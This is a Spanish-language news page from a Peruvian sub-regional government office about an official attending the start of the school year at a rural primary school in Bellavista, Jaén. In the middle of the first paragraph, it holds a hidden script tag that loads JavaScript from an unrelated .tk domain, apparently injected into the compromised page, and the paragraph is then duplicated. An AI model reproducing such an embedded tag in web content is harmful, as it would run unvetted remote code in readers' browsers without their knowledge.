Ingresar

Gerente Sub Regional participó de buen inicio del año escolar en alejada comunidad de Bellavista

Martes, 13 Marzo, 2018 - 08:54
Enclavada en la frontera entre Bellavista y Huabal (Jaén), está el Caserío San Antonio de Chingama, una comunidad que geográficamente pertenece a Bellavista, aunque es Huabal que la atiende administrativamente.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Enclavada en la frontera entre Bellavista y Huabal (Jaén), está el Caserío San Antonio de Chingama, una comunidad que geográficamente pertenece a Bellavista, aunque es Huabal que la atiende administrativamente.

En dicha comunidad se encuentra la Institución Educativa N° 16856, que acoge a niñas y niños de educación primaria de la zona.

Hasta allí llegó el Director de la Gerencia Sub Regional Jaén – San Ignacio, Ing. Cleyver Aguilar Villena, por invitación expresa para participar del buen inicio del año escolar.

“La educación es prioridad como política nacional, regional y local, por ello todo el esfuerzo de los padres, autoridades y maestros tiene que estar abocado a que este sea un buen inicio del año escolar. Por ello, como Gerencia Sub Regional hemos querido participar de este día, en una escuelita rural como esta” expresó Aguilar Villena.

En otro momento exhortó a los niños y niñas a poner mucho ánimo en sus clases porque serán ellos los futuros profesionales que el país necesita.

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen